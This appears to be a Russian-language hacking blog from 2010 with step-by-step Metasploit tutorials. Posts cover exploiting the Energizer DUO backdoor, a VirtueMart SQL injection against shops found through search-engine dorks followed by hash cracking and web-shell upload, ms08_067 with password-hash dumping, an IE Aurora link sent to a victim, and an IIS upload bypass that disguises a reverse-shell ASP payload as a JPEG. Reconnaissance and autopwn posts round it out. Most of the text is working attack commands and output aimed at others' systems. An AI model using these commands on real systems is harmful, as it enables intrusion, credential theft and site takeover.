dimanche 21 février 2010

Energizer троян

Newsophere недавно гудело о том, что в Energizer's "DUO" USB Battery Charger включен вредоносный Backdoor в сопутствующем программном обеспечении. Бэкдор был обнаружен только после того как продукт был снят с линии, что привело некоторых к мысли, что троян прошел через весь жизненный цикл незамеченным. Хорошей новостью является то, что бэкдор сравнительно безвреден; если на машине стоит фаервол, то он должен препятствовать доступу к прослушке порта 7777. Backdoor не создает исходящие соединения и удаление программного обеспечения USB Charger software package очищает систему.

Теперь вы можете использовать Metasploit чтобы обнаружить зараженные системы в сети. После скачивания копии Metasploit и обновление до версии 8749 или выше, следующие команды могут использоваться для сканирования сети:
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BA

Для того, чтобы пойти еще дальше, получить доступ к системе и запустить этот бэкдор, используйте energizer_duo_payload модуль:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)

meterpreter > getuid
Server username: XPDEV\Developer

extrait de metasploit.com

Инъекция в Virtuemart

Сейчас я раскажу как провести SQL-инъекцию в VirtueMart (компонент интернет магазина для CMS Joomla!) при помощи сплоита для Metasploit Framework. Уязвимы все интернет магазины с VM версии 1.1.2 и ниже, коих в сети большинство, ибо версия 1.1.3 вышла совсем недавно.
Сразу оговорюсь - это моя первая статья о хакинге, не судите строго. Эта статья расчитана на новичков и не на что не претендует. И еще - я не волшебник, я только учусь (с)

Итак начнем.

Инструментарий.

1. OS: Я использовал Windows XP sp3, и рассказывать буду применительно к ней, хотя читатель сможет без труда адаптировать все нижесказаное применительно к своей системе.

2. Metasloit Framework 3.2

3. VirtueMart <= 1.1.2 Remote SQL Injection Exploit - код сплоита можно найти на milw0rm, воспользовавшись поиском. Выбираем жертву. Если у вас нету на примете жертвы то достаточно просто ее найти используя яндекc (ну или любой другой поисковик - я не настаиваю). Поищем такую строку - "option com_virtuemart". На выходе имеем кучку магазинов, уязвимые придется находить методом тыка.

К оружию.

1. Для начала ставим Metasploit, руководств по этому действу предостаточно в том числе и на данном форуме. Посему этот шаг я описывать не буду.

2. Берем код сплоита и сохраняем его в файл VirtueMart-expl.rb. Впрочем файл можно назвать как угодно, важно расширение .rb.

3. Идем в папку со сплоитами в домашней папке msf32. У меня это

C:\Documents and Settings\Snow\Application Data\msf32\modules\exploits


И сохраняем наш сплоит VirtueMart-expl.rb в cоответствующую папку

unix\webapp

Однако можно сохранить куда угодно в рамках папки exploits, роли не играет. Также замечу - несмотря на то что мы сохранили в папку unix. сплоиту побарабану на ОС установленую на сервере.

4. Итак наш сплоит установлен, запускаем Metasploit Framework. Я предпочитаю WEB интерфейс, однако вы можете использовать и другие интерфейсы (GUI или консоль).
Так или иначе открываем консоль (ссылка Console в веб интерфейсе, либо ctrl+A в GUI)

5. Итак мы в консоли.

=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux

msf >

Смотрим какие сплоиты у нас установлены

msf> show exploits

И ищем нашего подопытного

unix/webapp/VirtueMart-expl VirtueMart <= 1.1.2 Sql Injection



Если не нашли внимательно повторяем предыдущие шаги. Итак нашли далее подгружаем его

msf> use unix/webapp/VirtueMart-expl

Смотрим список его настроек

msf auxiliary(VirtueMart-expl) > info

Должны получить такой вывод



Для невладеющих басурманским поясню все опции
ALLA - бинарное значение, если true то идет выборка всех пользователей группы - администраторы
ALLM - бинарное значение, если true то идет выборка всех пользователей группы - менеджеры
ALLSA - бинарное значение, если true то идет выборка всех пользователей группы - суперадминистраторы. По умолчанию выбираются только они. От себя добавлю что залить шелл вы сможете только с аккаунтом суперадминистратора.
PREFIX - Префикс таблиц в базе данных, по умолчанию jos_ однако особо неуемные дезигнеры его меняют. Если версия мускула >= 5, то при неверном префиксе сплоит попытается вычислить верный.
Proxies - можно задать парамерты прокси цепи дабы не сильно палится, но это уже другая сказка.
RHOST - обязательный параметр, определяет адрес цели. Вводится в виде domain.zone
RPORT - порт веб сервера, мне не доводилось встречать интернет магазин на нестандартном порту
SSL - бинарное значение - использeтся ли на сервере SSL
TARGETID - помимо выборки админов суперадминов и менеджеров можно делать выборку по смертным пользователям. Сюда пишем ID юзера.
URI - путь до Joomla, если она в корне то не меняем.
VHOST - если в RHOST указан домен а не ip то тут можно не заполнять.

Итак в самом обычном случае когда мы знаем о жертве только адрес, его и ставим не меняя ничего другого.

msf auxiliary(VirtueMart-expl) > set RHOST domain.zone

Таким же образом можно менять и другие параметры, например

msf auxiliary(VirtueMart-expl) > set ALLA true

когда мы закончили конфигурировать наш сплоит еще раз проверяем параметры

msf auxiliary(VirtueMart-expl) > show options

Если все корректно то запускаем

msf auxiliary(VirtueMart-expl) > exploit

Далее возможно несколько вариантов развития событий, рассмотрим по порядку

Pre-test 1 failed - VirtueMart not detected

По указаному адресу виртуемарта не обнаружено, помимо криво указаных параметров может быть что глючит из за включенного на сайте ЧПУ (mod-rewrite) у меня такое бывало.

Pre-test 2 failed - traget patched?

Дырка залатана

Далееи если ошибок нету, будет произведена проверка префикса, Если все верно то пойдет вычисление имени юзера а далее вычисление хэша, если нет то сплоит попытается вычислить верный префикс из INFORMATION_SCHEMA, далее по тому же сценарию.
По успешному завершению работы будут выведеы выбраные из базы имена пользователей и хэши к ним. Надо отметить что в зависимости от версии Joomla тип хэша может отличатся. Так в версиях 1.0.х это обыкновенный md5, а в версиях 1.5.х это md5:salt. salt обычно состоит из 16-ти символов.

6. Итак мы получили имена позьзователей и хэши их паролей. Что дальше спросите вы? А дальше надо их крякать, Я использую PasswordPro который можно найти на этом форуме. Также можно использовать онлайн сервисы коих очень много, однако они помогают в случае с простыми паролями.
Также можно юзать Rainbow таблицы но вопервых это уже другая сказка ну а во вторых ваш покорный слуга сам в них не бум бум.

7. Если нам удалось получить доступ к аккаунту суперадминистратора то по адресу /administrator логинимся в админку и смотрим наличиствует ли компонент joomlaXplorer. Если да то спокойно себе льем шелл, если нет то ставим этот компонент. Также используя компонент JoomlaPack можно силть базу и весь сайт.

Ну вот и все.

И как это принято, статья написана в качестве ознакомления и с целью показать уязвимость VM версии 1.1.2 (К слову в 1.1.3 дыра залатана).

Дополнение:
Залить шелл в Joomla 1.0 без палива и с правами обычного администратора можно так:
Идем в Установка-> Компонент. Длее выбираем файл нашего шелла и жмем загрузить, жумла выкидывает ошибку но файл заливает. Он лежит в /media

Автор не несет ответственности за использование материалов даной статьи.

(c) $now специально для stopxaker.ru

samedi 20 février 2010

Hash Dumping

В этой статье мы расскажем и покажем как тырить администраторские пароли с чужих тачек с помощью MSF.

С самого начала предположим, что машина, с которой нужно угнать пароли, слаба на ms08_067_netapi exploit. Это так для примера, главное на тачку попасть. Итак :
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151

msf exploit(ms08_067_netapi) > set LPORT 4444

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.120:1041)

Итак мы в тачке. Теперь займемся собственно делом :
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::

Хэши у нас в руках. Загоняем их в SamInside и через несколько минут пароли у нас на руках. Вот так :)

$vz00r

mercredi 17 février 2010

"Aurora" IE Exploit

Эксплоит довольно свежий и шансы на успех есть.
Модуль функционирует в данный момент только с IE6.
Для начала создадим ядовитую ссылку. Запускаем консоль и вводим :
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >
Отправляем нашу полученную ссылку (http://192.168.0.151:8080/) жертве. Не закрывайте консоль. Если эксплоит прокатил мы должны увидеть в консоли MSF:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
IP жертвы 192.168.0.166.
Начинаем сессию:
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer
Поздравляем, мы внутри!
Просто для прикола возьмем скриншот рабочего стола машины жертвы:
meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>
extrait de metasloit.com

mardi 16 février 2010

Эксплуатируем Microsoft IIS

Предположим, что у нас имеется Веб приложение, которое позволяет пользователям загружать изображения на сервер. Чтоб усложнить задачу, также предположим, что приложение проверяет является ли загружаемый файл действительно изображением.

Сначала мы сгенерируем ASP скрипт, который подключит Meterpreter назад, к нашей машине:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Теперь нам нужно сделать так, чтобы msfconsole приняло входящее соединение:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

Чтоб обойти проверку на содержание изображения, мы предварим наш ASP скрипт изображением в формате JPG:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Теперь отправляем наше «evil.asp;. Jpg" изображение через выбранное Веб приложение. Так как расширение нашего файла оканчивается на "jpg", а содержание файла кажется JPEG , Веб приложение принимает наш файл и переименовывает его в "/ images / evil.asp;. Jpg"

Наконец мы впариваем URL ссылку (с нашим изображением) нашему соседу и когда он по ней переходит - это активирует нашу начинку и создаст сессию снашей msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service
Extrait de metasploit.com

NetBIOS Scanner

С помощью NetBIOS сканера можно получить имя хоста, домен и Ethernet MAC - адрес от машины, на которой запущен NetBIOS Services (Windows, Samba). Что делает этот инструмент уникальным является то, что он посылает второй запрос на каждый хост, нацеленный на имя хоста NetBIOS, запрашивая список адресов, с которыми связано это имя. Это позволяет эффективно перечислить все IP-адреса из Windows или Unix (Samba) только двумя UDP пакетами. Эта технология позволяет производить идентификацию VPN клиента, VMware Virtual сетей и т.д. Приведенные ниже примеры показывают модуль в работе и некоторые результаты, которые можно найти при его использовании.

msf> use auxiliary/scanner/netbios/nbname
msf auxiliary(nbname) > set RHOSTS 192.168.0.0/24
msf auxiliary(nbname) > run

[*] Sending NetBIOS status requests to 192.168.0.0->192.168.0.255

[*] 192.168.0.142 [WIN7SONY] OS:Windows
Names:(WIN7SONY, WORKGROUP)
Addresses:(192.168.0.142, 192.168.50.1, 192.168.6.1)
Mac:00:1d:ba:xx:xx:xx

[*] 192.168.0.2 [STORAGE] OS:Unix
Names:(STORAGE, WORKGROUP)
Addresses:(192.168.0.2, 66.194.xx.xx)
Mac:00:00:00:00:00:00


Этот пример показывает машину под Windows 7 VMware Workstation (два IP адресса дополнительных) и одну систему под Ubuntu Linux Samba с внутренним и внешним IP адресом. Внешняя машина под Samba с несколькими интерфейсами тогда может выглядеть так:

[*] 66.240.xx.xx [DBxxxxxx] OS:Unix
Names:(DBxxxxxx, __MSBROWSE__)
Addresses:(66.240.xx.xx, 71.6.yy.yy, 71.6.zz.zz)
Mac:00:00:00:00:00:00
Demo:


Extrait de metasploit.com


dimanche 7 février 2010

SMB Version Scanning

В этой статье мы рассмотрим SMB Version Scanner, который позволяет определить версию и язык системы, которая крутится на тачке.





Ну вот, скан завершен и мы можем видеть, что на компе стоит Windows XP Service Pack 2/ язык французский/ имя компа SN508..... и имя в сети WORKGROUP.

$vz00r

samedi 6 février 2010

Port Scanning

Metasploit вещь довольно универсальная, поэтому в нем есть довольно разнообразные инструменты для сканирования. Воспользуемся командой search :

Вот здесь сколько всего. Мы, для начала, рассмотрим простейший сканер портов :

Используем tcp scanner чтобы просканить на открытые порты :

Единственное условие – RHOSTS [IP адресс жертвы] и набираем exploit :
Диапазон портов 1 - 10000. Если необходимо засканить целый диапазон адрессов, то набираем примерно так - 192.168.1.3/25

Через несколько минут результат - открытые порты: 21, 135, 139 и 445.

$vz00r

vendredi 5 février 2010

Metasploit Autopwn

Metasploit имеет очеь интерессный инструмент для использования. – Metasploit Autopwn –
Если вы не знаете какой эксплоит использовать или вам просто лень изучать жертву - то это для вас.
Короче, открываем консоль и набираем db_driver чтобы уточнить драйвер датабазы.

Создадим свою базу данных. Для этого командуем db_create hack

« Hack » - это название нашей базы, оно может быть другим - вам решать.
Так, базу создали, теперь засканируем жертву : db_nmap –A –O 192.168.1.3

Db_nmap активирует сканер NMAP [он был установлен вместе с Metasploit]
Аргумент [–A] - запрашивает агрессивный скан [–O] определяет эксплуатационную систему.

Скан завершен, подбираем эксплоиты : db_autopwn –p –t


Ну вот и все, остается только скомандовать db_autopwn –p –t –e –r чтобы запустить процесс атаки.

Команда db_autopwn может иметь следующие флаги :
-t Выводит все возможные эксплоиты.
-x Выбор эксплоитов по их реферанс.
-p Выбор эксплоитов по портам .
-e Запускает эксплоит.
-r Использовать reverse connect shell.
-b Использовать bind shell.
-h Меню справки.

Команды для работы с вашей базой :
db_connecte – Соединиться с существующей базой.
db_create – Создать новую базу.
db_destroy – Удалить существующую базу.
db_disconnect – Выйти из базы.
db_driver – Уточнить драйвер базы.

$vz00r